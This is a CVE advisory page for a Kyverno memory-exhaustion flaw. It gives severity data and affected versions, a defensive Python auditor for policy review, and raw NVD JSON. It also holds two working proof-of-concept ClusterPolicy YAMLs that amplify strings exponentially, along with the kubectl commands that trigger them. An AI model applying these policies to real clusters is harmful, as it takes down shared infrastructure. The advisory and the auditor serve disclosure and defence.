Security Vulnerability Report
CVE-2026-23881 CVSS 7.7 HIGH

CVE-2026-23881

Published: 2026-01-27 17:16:13
Last Modified: 2026-02-02 15:20:13

Description

Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have unbounded memory consumption in Kyverno's policy engine that allows users with policy creation privileges to cause denial of service by crafting policies that exponentially amplify string data through context variables. Versions 1.16.3 and 1.15.3 contain a patch for the vulnerability.

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:* - VULNERABLE (Kyverno < 1.15.3)
cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:* - VULNERABLE (Kyverno >= 1.16.0 and < 1.16.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
yaml
# CVE-2026-23881 PoC - Kyverno Unbounded Memory Consumption
# This PoC demonstrates the memory exhaustion via crafted policy
# Note: This is for educational purposes only
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: memory-exhaustion-poc
spec:
  rules:
    - name: exploit-memory
      match:
        any:
          - resources:
              kinds:
                - Pod
      context:
        # Exponential string amplification through context variables
        - name: amplifiedData
          variable:
            # This creates exponential string growth
            value: "{{request.object.metadata.name}}{{request.object.metadata.name}}{{request.object.metadata.name}}{{request.object.metadata.name}}{{request.object.metadata.name}}{{request.object.metadata.name}}{{request.object.metadata.name}}{{request.object.metadata.name}}"
        - name: doubleAmplified
          variable:
            # Multiply the amplified data again
            value: "{{amplifiedData}}{{amplifiedData}}{{amplifiedData}}{{amplifiedData}}{{amplifiedData}}{{amplifiedData}}{{amplifiedData}}{{amplifiedData}}"
      validate:
        message: "Memory exhaustion test"
        deny:
          conditions:
            all:
              - key: "{{doubleAmplified}}"
                operator: NotEqual
                value: ""
---
# Alternative: Recursive context variable expansion
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: recursive-expansion-poc
spec:
  rules:
    - name: recursive-exploit
      match:
        any:
          - resources:
              kinds:
                - Pod
      context:
        # Multiple chained variable references cause exponential growth
        - name: layer1
          variable:
            value: "{{request.object.metadata.name}}{{request.object.metadata.name}}"
        - name: layer2
          variable:
            value: "{{layer1}}{{layer1}}{{layer1}}{{layer1}}"
        - name: layer3
          variable:
            value: "{{layer2}}{{layer2}}{{layer2}}{{layer2}}"
        - name: layer4
          variable:
            value: "{{layer3}}{{layer3}}{{layer3}}{{layer3}}"
        - name: layer5
          variable:
            value: "{{layer4}}{{layer4}}{{layer4}}{{layer4}}"
      validate:
        message: "Recursive context expansion"
        deny:
          conditions:
            all:
              - key: "{{layer5}}"
                operator: Equals
                value: ""
# To trigger: Apply the policy and create any Pod
# kubectl apply -f policy.yaml
# kubectl run test-pod --image=nginx
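
For policy review on clusters that cannot be upgraded immediately, the following added example (not part of the original page and not Kyverno's own code) statically estimates how many copies of request data each context variable expands to, so chained fan-out like layer1 through layer5 above is flagged before a policy is admitted. The policy dicts are constructed sample data, the threshold of 16 and the function names are assumptions, and only bare {{name}} references to earlier context variables are resolved.

```python
import re

# Matches {{ name }} style variable references inside a policy string.
VAR_REF = re.compile(r"\{\{\s*([^{}]+?)\s*\}\}")
MAX_FACTOR = 16  # assumed review threshold, not a Kyverno setting


def amplification(rule):
    """Return {context variable: copies of request data after expansion}."""
    factors = {}
    for entry in rule.get("context", []):
        value = entry.get("variable", {}).get("value")
        if not isinstance(value, str):
            continue
        # A reference to an earlier context variable contributes that
        # variable's factor; any other reference counts as one copy.
        factors[entry["name"]] = sum(
            factors.get(ref, 1) for ref in VAR_REF.findall(value))
    return factors


def audit_policy(policy, limit=MAX_FACTOR):
    """List (policy, rule, variable, factor) for variables over the limit."""
    findings = []
    for rule in policy.get("spec", {}).get("rules", []):
        for name, factor in amplification(rule).items():
            if factor > limit:
                findings.append(
                    (policy["metadata"]["name"], rule["name"], name, factor))
    return findings


def _var(name, ref, copies):
    # Helper for building constructed sample context entries.
    return {"name": name, "variable": {"value": ("{{%s}}" % ref) * copies}}


# Constructed sample input: the layered structure of the page's second policy.
SAMPLE_POLICY = {
    "metadata": {"name": "recursive-expansion-poc"},
    "spec": {"rules": [{"name": "recursive-exploit", "context": [
        _var("layer1", "request.object.metadata.name", 2),
        _var("layer2", "layer1", 4), _var("layer3", "layer2", 4),
        _var("layer4", "layer3", 4), _var("layer5", "layer4", 4)]}]},
}
# Constructed benign policy: one plain lookup, no chaining.
BENIGN_POLICY = {
    "metadata": {"name": "app-label"},
    "spec": {"rules": [{"name": "read-label", "context": [
        _var("app", "request.object.metadata.labels.app", 1)]}]},
}

if __name__ == "__main__":
    for finding in audit_policy(SAMPLE_POLICY):
        print("review: policy=%s rule=%s variable=%s factor=%d" % finding)
```

The factor multiplies at every layer, so a per-variable limit catches the chain at the first layer that crosses it rather than only at the final one.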

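References

https://github.com/kyverno/kyverno/commit/7a651be3a8c78dcabfbf4178b8d89026bf3b850f (Patch)
https://github.com/kyverno/kyverno/commit/f5617f60920568a301740485472bf704892175b7 (Patch)
https://github.com/kyverno/kyverno/security/advisories/GHSA-r2rj-wwm5-x6mq (Exploit, Mitigation, Vendor Advisory)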

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23881", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:12.733", "lastModified": "2026-02-02T15:20:13.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have unbounded memory consumption in Kyverno's policy engine that allows users with policy creation privileges to cause denial of service by crafting policies that exponentially amplify string data through context variables. Versions 1.16.3 and 1.15.3 contain a patch for the vulnerability."}, {"lang": "es", "value": "Kyverno es un motor de políticas diseñado para equipos de ingeniería de plataformas nativas de la nube. Las versiones anteriores a la 1.16.3 y 1.15.3 tienen un consumo de memoria ilimitado en el motor de políticas de Kyverno que permite a los usuarios con privilegios de creación de políticas causar una denegación de servicio mediante la elaboración de políticas que amplifican exponencialmente los datos de cadena a través de variables de contexto. Las versiones 1.16.3 y 1.15.3 contienen un parche para la vulnerabilidad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.15.3", "matchCriteriaId": "EC83E83A-2BA5-4A52-AF06-06E67CA03749"}, {"vulnerable": true, "criteria": "cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.16.0", "versionEndExcluding": "1.16.3", "matchCriteriaId": "AFFC15A4-197B-44FB-985A-BDDE22679655"}]}]}], "references": [{"url": "https://github.com/kyverno/kyverno/commit/7a651be3a8c78dcabfbf4178b8d89026bf3b850f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kyverno/kyverno/commit/f5617f60920568a301740485472bf704892175b7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-r2rj-wwm5-x6mq", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}